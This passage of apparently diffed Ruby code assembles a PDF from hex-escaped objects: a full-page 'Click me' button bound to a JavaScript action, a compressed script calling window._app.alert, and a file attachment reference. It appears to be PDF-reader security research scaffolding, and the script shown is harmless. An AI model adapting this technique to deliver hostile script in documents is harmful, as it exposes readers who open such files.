x57\x54\x36\x55\x40\x8d\xa0\xe6\x50\x2b\xa8\xed\xd4\x21\xea\x7e\xea\x19\xea\x6d\xea\x13\x1a\x8d\xe6\x44\xb\xa5\x65\xd2\xd4\xb4\xe5\xb4\x21\xda\xef\x68\x9f\xd3\xa6\x68\x2f\xe8\x1c\xba\x27\x5d\x42\x2f\xa2\x1b\xe9\xeb\xe8\x1f\xd2\x8f\xd3\xbf\xa2\x3f\x61\x30\x18\x6e\x8c\x68\x46\x21\xc3\xc0\x58\xc7\xd8\xcd\x38\xc5\xf8\x9a\xf1\xdc\x8c\x6b\xe6\x63\x26\x35\x53\x98\xb5\x99\x8d\x98\x1d\x36\xbb\x6c\xf6\x98\x49\x61\xba\x32\x63\x98\x4b\x99\x4d\xcc\x41\xe6\x21\xe6\x45\xe6\x23\x16\x85\xe5\xc6\x92\xb0\x64\xac\x56\xd6\x8\xeb\x28\xeb\x6\x6b\x96\xcd\x65\x8b\xd8\xe9\x6c\xd\xbb\x97\xbd\x87\x7d\x8e\x7d\x9f\x43\xe2\xb8\x71\xe2\x39\xd\x4e\x27\xe7\x3\xce\x29\xce\x5d\x2e\xc2\x75\xe6\x4a\xb8\x72\xee\xd\xee\x18\xf7\xc\x77\x9a\x47\xe4\x9\x78\x52\x5e\x5\xaf\x87\xf7\x5b\xde\x4\x6f\xc6\x9c\x63\x1e\x68\x9e\x67\xde\x60\x3e\x62\xfe\x89\xf9\x24\x1f\xe1\xbb\xf1\xa5\xfc\x2a\x7e\x1f\xff\x20\xff\x3a\xff\xa5\x85\x9d\x45\x8c\x85\xd2\x62\x8d\xc5\x7e\x8b\xcb\x16\xcf\x2c\x6d\x2c\xa3\x2d\x95\x96\xdd\x96\x7\x2c\xaf\x59\xbe\xb4\xc2\xac\xe2\xad\x2a\xad\x36\x58\x8d\x5b\xdd\xb1\x46\xad\x3d\xad\x33\xad\xeb\xad\xb7\x59\x9f\xb1\x7e\x64\xc3\xb3\x9\xb7\x91\xdb\x74\xdb\x1c\xb4\xb9\x69\xb\xdb\x7a\xda\x66\xd9\x36\xdb\x7e\x60\x7b\xc1\x76\xd6\xce\xde\x2e\xd1\x4e\x67\xb7\xc5\xee\x94\xdd\x23\x7b\xbe\x7d\xb4\x7d\x85\xfd\x80\xfd\xa7\xf6\xf\x1c\xb8\xe\x91\xe\x6a\x87\x1\x87\xcf\x1c\xfe\x8a\x99\x63\x31\x58\x15\x36\x84\x9d\xc6\x66\x1c\x6d\x1d\x93\x1c\x8d\x8e\x3b\x1c\x27\x1c\x5f\x39\x9\x9c\x72\x9d\x3a\x9c\xe\x38\xdd\x71\xa6\x3a\x8b\x9d\xcb\x9c\x7\x9c\x4f\x3a\xcf\xb8\x38\xb8\xa4\xb9\xb4\xb8\xec\x75\xb9\xe9\x4a\x71\x15\xbb\x96\xbb\x6e\x76\x3d\xeb\xfa\xcc\x4d\xe0\x96\xef\xb6\xca\x6d\xdc\xed\xbe\xc0\x52\x20\x15\x34\x9\xf6\xd\x6e\xbb\x33\xdc\xa3\xdc\x6b\xdc\x47\xdd\xaf\x7a\x10\x3d\xc4\x1e\x95\x1e\x5b\x3d\xbe\xf4\x84\x3d\x83\x3c\xcb\x3d\x47\x3c\x2f\x7a\xc1\x5e\xc1\x5e\x6a\xaf\xad\x5e\x97\xbc\x9\xde\xa1\xde\x5a\xef\x51\xef\x1b\x42\xba\x30\x46\x58\x27\xdc\x2b\x9c\xf2\xe1\xfb\xa4\xfa\x74\xf8\x8c\xfb\x3c\xf6\x75\xf1\x2d\xf4\xdd\xe0\x7b\xd6\xf7\
xb5\x5f\x90\x5f\x95\xdf\x98\xdf\x2d\x11\x47\x94\x2c\xea\x10\x1d\x13\x7d\xe7\xef\xe9\x2f\xf7\x1f\xf1\xbf\x1a\xc0\x8\x48\x8\x68\xb\x38\x12\xf0\x6d\xa0\x57\xa0\x32\x70\x5b\xe0\x9f\x83\xb8\x41\x69\x41\xab\x82\x4e\x6\xfd\x23\x38\x24\x58\x1f\xbc\x3f\xf8\x41\x88\x4b\x48\x49\xc8\x7b\x21\x37\xc4\x3c\x71\x86\xb8\x57\xfc\x79\x28\x21\x34\x36\xb4\x2d\xf4\xe3\xd0\x17\x61\xc1\x61\x86\xb0\x83\x61\x7f\xf\x17\x86\x57\x86\xef\x9\xbf\xbf\x40\xb0\x40\xb9\x60\x6c\xc1\xdd\x8\xa7\x8\x59\xc4\x8e\x88\xc9\x48\x2c\xb2\x24\xf2\xfd\xc8\xc9\x28\xc7\x28\x59\xd4\x68\xd4\x37\xd1\xce\xd1\x8a\xe8\x9d\xd1\xf7\x62\x3c\x62\x2a\x62\xf6\xc5\x3c\x8e\xf5\x8b\xd5\xc7\x7e\x14\xfb\x4c\x12\x26\x59\x26\x39\x1e\x87\xc4\x25\xc6\x75\xc7\x4d\xc4\x73\xe2\x73\xe3\x87\xe3\xbf\x4e\x70\x4a\x50\x25\xec\x4d\x98\x49\xc\x4a\x6c\x4e\x3c\x9e\x44\x48\x4a\x49\xda\x90\x74\x43\x6a\x27\x95\x4b\x77\x4b\x67\x92\x43\x92\x97\x25\x9f\x4e\xa1\xa7\x64\xa7\xc\xa7\x7c\x93\xea\x99\xaa\x4f\x3d\x96\x6\xa7\x25\xa7\x6d\x4c\xbb\xbd\xd0\x75\xa1\x76\xe1\x78\x3a\x48\x97\xa6\x6f\x4c\xbf\x93\x21\xc8\xa8\xc9\xf8\x43\x26\x31\x33\x23\x73\x24\xf3\x2f\x59\xa2\xac\x96\xac\xb3\xd9\xdc\xec\xe2\xec\x3d\xd9\x4f\x73\x62\x73\xfa\x72\x6e\xe5\xba\xe7\x1a\x73\x4f\xe6\x31\xf3\x8a\xf2\x76\xe7\x3d\xcb\x8f\xcb\xef\xcf\x9f\x5c\xe4\xbb\x68\xd9\xa2\xf3\x5\xd6\x5\xea\x82\x23\x85\xa4\xc2\xbc\xc2\x9d\x85\xb3\x8b\xe3\x17\x6f\x5a\x3c\x5d\x14\x54\xd4\x55\x74\x7d\x89\x60\x49\xc3\x92\x73\x4b\xad\x97\x56\x2d\xfd\xa4\x98\x59\x2c\x2b\x3e\x54\x42\x28\xc9\x2f\xd9\x53\xf2\x83\x2c\x5d\x36\x2a\x9b\x2d\x95\x96\xbe\x57\x3a\x23\x97\xc8\x37\xcb\x1f\x2a\xa2\x15\x3\x8a\x7\xca\x8\x65\xbf\xf2\x5e\x59\x44\x59\x7f\xd9\x7d\x55\x84\x6a\xa3\xea\x41\x79\x54\xf9\x60\xf9\x23\xb5\x44\x3d\xac\xfe\xb6\x22\xa9\x62\x7b\xc5\xb3\xca\xf4\xca\xf\x2b\x7f\xac\xca\xaf\x3a\xa0\x21\x6b\x4a\x34\x47\xb5\x1c\x6d\xa5\xf6\x74\xb5\x7d\x75\x43\xf5\x25\x9d\x97\xae\x4b\x37\x59\x13\x56\xb3\xa9\x66\x46\x9f\xa2\xdf\x59\xb\xd5\x2e\xa9\x3d\x62\xe0\xe1\x3f\x53\x17\x8c\xee\xc6\x95\xc6\xa9\xba\xc8\xba\x91\xba\xe7\xf5\x79\xf5\x87\x1a\xd
8\xd\xda\x86\xb\x8d\x9e\x8d\x6b\x1a\xef\x35\x25\x34\xfd\xa6\x19\x6d\x96\x37\x9f\x6c\x71\x6c\x69\x6f\x99\x5a\x16\xb3\x6c\x47\x2b\xd4\x5a\xda\x7a\xb2\xcd\xb9\xad\xb3\x6d\x7a\x79\xe2\xf2\x5d\xed\xd4\xf6\xca\xf6\x3f\x75\xf8\x75\xf4\x77\x7c\xbf\x22\x7f\xc5\xb1\x4e\xbb\xce\xe5\x9d\x77\x57\x26\xae\xdc\xdb\x65\xd6\xa5\xef\xba\xb1\x2a\x7c\xd5\xf6\xd5\xe8\x6a\xf5\xea\x89\x35\x1\x6b\xb6\xac\x79\xdd\xad\xe8\xfe\xa2\xc7\xaf\x67\xb0\xe7\x87\x5e\x79\xef\x17\x6b\x45\x6b\x87\xd6\xfe\xb8\xae\x6c\xdd\x44\x5f\x70\xdf\xb6\xf5\xc4\xf5\xda\xf5\xd7\x37\x44\x6d\xd8\xd5\xcf\xee\x6f\xea\xbf\xbb\x31\x6d\xe3\xe1\x1\x6c\xa0\x7b\xe0\xfb\x4d\xc5\x9b\xce\xd\x6\xe\x6e\xdf\x4c\xdd\x6c\xdc\x3c\x39\x94\xfa\x4f\x0\xa4\x1\x5b\xfe\x98\xb8\x99\x24\x99\x90\x99\xfc\x9a\x68\x9a\xd5\x9b\x42\x9b\xaf\x9c\x1c\x9c\x89\x9c\xf7\x9d\x64\x9d\xd2\x9e\x40\x9e\xae\x9f\x1d\x9f\x8b\x9f\xfa\xa0\x69\xa0\xd8\xa1\x47\xa1\xb6\xa2\x26\xa2\x96\xa3\x6\xa3\x76\xa3\xe6\xa4\x56\xa4\xc7\xa5\x38\xa5\xa9\xa6\x1a\xa6\x8b\xa6\xfd\xa7\x6e\xa7\xe0\xa8\x52\xa8\xc4\xa9\x37\xa9\xa9\xaa\x1c\xaa\x8f\xab\x2\xab\x75\xab\xe9\xac\x5c\xac\xd0\xad\x44\xad\xb8\xae\x2d\xae\xa1\xaf\x16\xaf\x8b\xb0\x0\xb0\x75\xb0\xea\xb1\x60\xb1\xd6\xb2\x4b\xb2\xc2\xb3\x38\xb3\xae\xb4\x25\xb4\x9c\xb5\x13\xb5\x8a\xb6\x1\xb6\x79\xb6\xf0\xb7\x68\xb7\xe0\xb8\x59\xb8\xd1\xb9\x4a\xb9\xc2\xba\x3b\xba\xb5\xbb\x2e\xbb\xa7\xbc\x21\xbc\x9b\xbd\x15\xbd\x8f\xbe\xd\xbe\x84\xbe\xff\xbf\x7a\xbf\xf5\xc0\x70\xc0\xec\xc1\x67\xc1\xe3\xc2\x5f\xc2\xdb\xc3\x58\xc3\xd4\xc4\x51\xc4\xce\xc5\x4b\xc5\xc8\xc6\x46\xc6\xc3\xc7\x41\xc7\xbf\xc8\x3d\xc8\xbc\xc9\x3a\xc9\xb9\xca\x38\xca\xb7\xcb\x36\xcb\xb6\xcc\x35\xcc\xb5\xcd\x35\xcd\xb5\xce\x36\xce\xb6\xcf\x37\xcf\xb8\xd0\x39\xd0\xba\xd1\x3c\xd1\xbe\xd2\x3f\xd2\xc1\xd3\x44\xd3\xc6\xd4\x49\xd4\xcb\xd5\x4e\xd5\xd1\xd6\x55\xd6\xd8\xd7\x5c\xd7\xe0\xd8\x64\xd8\xe8\xd9\x6c\xd9\xf1\xda\x76\xda\xfb\xdb\x80\xdc\x5\xdc\x8a\xdd\x10\xdd\x96\xde\x1c\xde\xa2\xdf\x29\xdf\xaf\xe0\x36\xe0\xbd\xe1\x44\xe1\xcc\xe2\x53\xe2\xdb\xe3\x63\xe3\xeb\xe4\x73\xe4\xfc\xe5\x84\xe6\xd\xe
6\x96\xe7\x1f\xe7\xa9\xe8\x32\xe8\xbc\xe9\x46\xe9\xd0\xea\x5b\xea\xe5\xeb\x70\xeb\xfb\xec\x86\xed\x11\xed\x9c\xee\x28\xee\xb4\xef\x40\xef\xcc\xf0\x58\xf0\xe5\xf1\x72\xf1\xff\xf2\x8c\xf3\x19\xf3\xa7\xf4\x34\xf4\xc2\xf5\x50\xf5\xde\xf6\x6d\xf6\xfb\xf7\x8a\xf8\x19\xf8\xa8\xf9\x38\xf9\xc7\xfa\x57\xfa\xe7\xfb\x77\xfc\x7\xfc\x98\xfd\x29\xfd\xba\xfe\x4b\xfe\xdc\xff\x6d\xff\xff\x2\xc\x0\xf7\x84\xf3\xfb\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(38, "\xd\x3c\x3c\x2f\x41\x20\x34\x33\x20\x30\x20\x52\x2f\x41\x50\x3c\x3c\x2f\x4e\x20\x35\x31\x20\x30\x20\x52\x3e\x3e\x2f\x44\x41\x28\x2f\x48\x65\x42\x6f\x20\x31\x32\x20\x54\x66\x20\x30\x20\x67\x29\x2f\x46\x20\x34\x2f\x46\x54\x2f\x42\x74\x6e\x2f\x46\x66\x20\x36\x35\x35\x33\x36\x2f\x4d\x4b\x3c\x3c\x2f\x42\x47\x5b\x31\x2e\x30\x20\x31\x2e\x30\x20\x31\x2e\x30\x5d\x2f\x43\x41\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x50\x20\x31\x3e\x3e\x2f\x50\x20\x32\x36\x20\x30\x20\x52\x2f\x52\x65\x63\x74\x5b\x30\x2e\x30\x20\x30\x2e\x36\x31\x34\x38\x36\x38\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x32\x2e\x30\x5d\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x57\x69\x64\x67\x65\x74\x2f\x54\x28\x62\x74\x6e\x43\x6c\x69\x63\x6b\x4d\x65\x29\x2f\x54\x55\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x79\x70\x65\x2f\x41\x6e\x6e\x6f\x74\x3e\x3e\xd") - add_object(43, "\xd\x3c\x3c\x2f\x4a\x53\x20\x34\x36\x20\x30\x20\x52\x2f\x53\x2f\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x3e\x3e\xd") - add_object(51, 
"\xd\x3c\x3c\x2f\x42\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x31\x2e\x33\x38\x35\x5d\x2f\x46\x6f\x72\x6d\x54\x79\x70\x65\x20\x31\x2f\x4c\x65\x6e\x67\x74\x68\x20\x36\x34\x2f\x4d\x61\x74\x72\x69\x78\x5b\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x20\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x5d\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x50\x72\x6f\x63\x53\x65\x74\x5b\x2f\x50\x44\x46\x5d\x3e\x3e\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x46\x6f\x72\x6d\x2f\x54\x79\x70\x65\x2f\x58\x4f\x62\x6a\x65\x63\x74\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x31\x20\x67\xd\x30\x20\x30\x20\x36\x31\x31\x2e\x33\x38\x33\x38\x20\x37\x39\x31\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x66\xd\x71\xd\x31\x20\x31\x20\x36\x30\x39\x2e\x33\x38\x33\x38\x20\x37\x38\x39\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x57\xd\x6e\xd\x51\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - # add_object(46, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x5b\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x5d\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x30\x32\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x84\x91\x4d\x4f\xc3\x30\xc\x86\xef\x95\xfa\x1f\xac\x5d\x92\x6a\x25\x41\xe2\x38\xc1\x85\x2b\x70\xe0\xca\x10\x4a\x13\xaf\xd\x34\x49\x95\xba\xfb\x10\xda\x7f\x27\x5d\xe9\x18\x12\x12\x3e\x58\x4e\xe2\xf7\xf5\x23\x67\x33\x78\x4d\x36\x78\xc0\x3d\xea\x81\x90\x57\xd1\x9a\x1a\x4b\xd0\xce\x14\xf0\x99\x67\x90\x22\x22\xd\xd1\xc3\xf4\x24\x6a\xa4\xfb\x56\xf5\x3d\x2f\xc4\x26\xc4\x27\xe5\x90\xb3\x77\xb5\x55\xa2\x55\xbe\x16\xcf\x83\x27\xeb\x90\x15\x93\x74\x8c\x51\xf1\x88\xd4\x4\xc3\x59\x2a\xe7\x8e\xd2\xf\x6d\x5b\x8\xeb\xb7\xe1\x3\xf9\x78\xf8\xbe\x19\x51\xf8\x38\x7f\x95\x67\xc7\x3c\xcb\x33\xbb\xe1\x3b\xeb\x4d\xd8\x89\x37\xd5\x75\x67\x2c\x8a\x87\xb1\x94\x72\x1e\xb4\x55\x11\x3a\x45\xd\xdc\x2\x93\xce\x93\xec\x8d\x56\xd1\x48\x17\x2a\xdb\x62\x44\x65\x30\x8a\x2e\x68\x41\x7b\x62\xab\x1f\xc0\x5f\x3a\xa3\x48\x4d\x49\x7\x27\x94\x9\x15\x8a\x49\xfa\xaf\xcf\xbc\xc3\xb\xd8\x12\x5e\x98\xec\xf\x3d\xa1\x93\x95\xf5\xb2\x6f\x58\xc9\xae\x
74\x4a\xa8\x9b\x0\xeb\xc5\x43\x88\xe8\xc0\x76\xfd\xe0\xd6\xb\xb8\x3\x6\xcb\x13\xcb\x6b\x71\x61\x7c\x61\x28\x54\x22\x20\x7e\xc2\x5d\xa6\x6e\x9d\x70\x8\xd\x2b\xe1\x66\x56\x1c\x41\x2b\xd2\xd\xc7\xf3\xa6\xfe\xf6\x48\xbf\x7c\x7d\xd6\xa4\x55\x7f\x9\x30\x0\x67\xa5\x9f\x47\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - - js = Zlib::Deflate.deflate("window._app.alert('HELLO WORLD', 3);") - add_object(46, "\x0d<</Filter[/FlateDecode]/Length 302>>stream\x0d#{js}\x0dendstream\x0d") - - - add_object(8, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x46\x69\x72\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x20\x37\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\x4c\x6f\x63\x61\x6c\x20\x44\x69\x73\x6b\x29\x3e\x3e\xd") - add_object(9, "\xd\x3c\x3c\x2f\x44\x65\x73\x74\x5b\x32\x36\x20\x30\x20\x52\x2f\x58\x59\x5a\x20\x30\x20\x37\x39\x32\x20\x6e\x75\x6c\x6c\x5d\x2f\x50\x61\x72\x65\x6e\x74\x20\x38\x20\x30\x20\x52\x2f\x53\x45\x20\x31\x35\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x3e\x3e\xd") - add_object(17, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x33\x35\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(18, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x31\x39\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(19, "\xd\x28\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x43\x7c\x2f\x74\x65\x6d\x70\x2f\x6a\x73\x2e\x74\x78\x74\x29\xd") - add_object(20, "\xd\x3c\x3c\x2f\x43\x54\x28\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x29\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4f\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x53\x2f\x53\x50\x53\x2f\x53\x49\x20\x32\x31\x20\x30\x20\x52\x2f\x54\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") - add_object(21, 
"\xd\x3c\x3c\x2f\x41\x55\x20\x31\x39\x20\x30\x20\x52\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") - add_object(39, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2d\x42\x6f\x6c\x64\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x42\x6f\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(47, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x6c\x76\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(48, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x5a\x61\x70\x66\x44\x69\x6e\x67\x62\x61\x74\x73\x2f\x4e\x61\x6d\x65\x2f\x5a\x61\x44\x62\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(45, 
"\xd\x3c\x3c\x2f\x44\x69\x66\x66\x65\x72\x65\x6e\x63\x65\x73\x5b\x32\x34\x2f\x62\x72\x65\x76\x65\x2f\x63\x61\x72\x6f\x6e\x2f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x64\x6f\x74\x61\x63\x63\x65\x6e\x74\x2f\x68\x75\x6e\x67\x61\x72\x75\x6d\x6c\x61\x75\x74\x2f\x6f\x67\x6f\x6e\x65\x6b\x2f\x72\x69\x6e\x67\x2f\x74\x69\x6c\x64\x65\x20\x33\x39\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x65\x20\x39\x36\x2f\x67\x72\x61\x76\x65\x20\x31\x32\x38\x2f\x62\x75\x6c\x6c\x65\x74\x2f\x64\x61\x67\x67\x65\x72\x2f\x64\x61\x67\x67\x65\x72\x64\x62\x6c\x2f\x65\x6c\x6c\x69\x70\x73\x69\x73\x2f\x65\x6d\x64\x61\x73\x68\x2f\x65\x6e\x64\x61\x73\x68\x2f\x66\x6c\x6f\x72\x69\x6e\x2f\x66\x72\x61\x63\x74\x69\x6f\x6e\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x6c\x65\x66\x74\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x72\x69\x67\x68\x74\x2f\x6d\x69\x6e\x75\x73\x2f\x70\x65\x72\x74\x68\x6f\x75\x73\x61\x6e\x64\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x62\x61\x73\x65\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x62\x61\x73\x65\x2f\x74\x72\x61\x64\x65\x6d\x61\x72\x6b\x2f\x66\x69\x2f\x66\x6c\x2f\x4c\x73\x6c\x61\x73\x68\x2f\x4f\x45\x2f\x53\x63\x61\x72\x6f\x6e\x2f\x59\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x5a\x63\x61\x72\x6f\x6e\x2f\x64\x6f\x74\x6c\x65\x73\x73\x69\x2f\x6c\x73\x6c\x61\x73\x68\x2f\x6f\x65\x2f\x73\x63\x61\x72\x6f\x6e\x2f\x7a\x63\x61\x72\x6f\x6e\x20\x31\x36\x30\x2f\x45\x75\x72\x6f\x20\x31\x36\x34\x2f\x63\x75\x72\x72\x65\x6e\x63\x79\x20\x31\x36\x36\x2f\x62\x72\x6f\x6b\x65\x6e\x62\x61\x72\x20\x31\x36\x38\x2f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x2f\x6f\x72\x64\x66\x65\x6d\x69\x6e\x69\x6e\x65\x20\x31\x37\x32\x2f\x6c\x6f\x67\x69\x63\x61\x6c\x6e\x6f\x74\x2f\x2e\x6e\x6f\x74\x64\x65\x66\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x65\x64\x2f\x6d\x61\x63\x72\x6f\x6e\x2f\x64\x65\x67\x72\x65\x65\x2f\x70
\x6c\x75\x73\x6d\x69\x6e\x75\x73\x2f\x74\x77\x6f\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x74\x68\x72\x65\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x61\x63\x75\x74\x65\x2f\x6d\x75\x20\x31\x38\x33\x2f\x70\x65\x72\x69\x6f\x64\x63\x65\x6e\x74\x65\x72\x65\x64\x2f\x63\x65\x64\x69\x6c\x6c\x61\x2f\x6f\x6e\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x6f\x72\x64\x6d\x61\x73\x63\x75\x6c\x69\x6e\x65\x20\x31\x38\x38\x2f\x6f\x6e\x65\x71\x75\x61\x72\x74\x65\x72\x2f\x6f\x6e\x65\x68\x61\x6c\x66\x2f\x74\x68\x72\x65\x65\x71\x75\x61\x72\x74\x65\x72\x73\x20\x31\x39\x32\x2f\x41\x67\x72\x61\x76\x65\x2f\x41\x61\x63\x75\x74\x65\x2f\x41\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x41\x74\x69\x6c\x64\x65\x2f\x41\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x41\x72\x69\x6e\x67\x2f\x41\x45\x2f\x43\x63\x65\x64\x69\x6c\x6c\x61\x2f\x45\x67\x72\x61\x76\x65\x2f\x45\x61\x63\x75\x74\x65\x2f\x45\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x45\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x49\x67\x72\x61\x76\x65\x2f\x49\x61\x63\x75\x74\x65\x2f\x49\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x49\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x45\x74\x68\x2f\x4e\x74\x69\x6c\x64\x65\x2f\x4f\x67\x72\x61\x76\x65\x2f\x4f\x61\x63\x75\x74\x65\x2f\x4f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x4f\x74\x69\x6c\x64\x65\x2f\x4f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x6d\x75\x6c\x74\x69\x70\x6c\x79\x2f\x4f\x73\x6c\x61\x73\x68\x2f\x55\x67\x72\x61\x76\x65\x2f\x55\x61\x63\x75\x74\x65\x2f\x55\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x55\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x59\x61\x63\x75\x74\x65\x2f\x54\x68\x6f\x72\x6e\x2f\x67\x65\x72\x6d\x61\x6e\x64\x62\x6c\x73\x2f\x61\x67\x72\x61\x76\x65\x2f\x61\x61\x63\x75\x74\x65\x2f\x61\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x61\x74\x69\x6c\x64\x65\x2f\x61\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x61\x72\x69\x6e\x67\x2f\x61\x65\x2f\x63\x63\x65\x64\x69\x6c\x6c\x61\x2f\x65\x67\x72\x61\x76\x65\x2f\x65\x61\x63\x75\x74\x65\x2f\x65\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x65\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x69\x67\x72
\x61\x76\x65\x2f\x69\x61\x63\x75\x74\x65\x2f\x69\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x69\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x65\x74\x68\x2f\x6e\x74\x69\x6c\x64\x65\x2f\x6f\x67\x72\x61\x76\x65\x2f\x6f\x61\x63\x75\x74\x65\x2f\x6f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x6f\x74\x69\x6c\x64\x65\x2f\x6f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x64\x69\x76\x69\x64\x65\x2f\x6f\x73\x6c\x61\x73\x68\x2f\x75\x67\x72\x61\x76\x65\x2f\x75\x61\x63\x75\x74\x65\x2f\x75\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x75\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x79\x61\x63\x75\x74\x65\x2f\x74\x68\x6f\x72\x6e\x2f\x79\x64\x69\x65\x72\x65\x73\x69\x73\x5d\x2f\x54\x79\x70\x65\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3e\x3e\xd") - add_object(23, 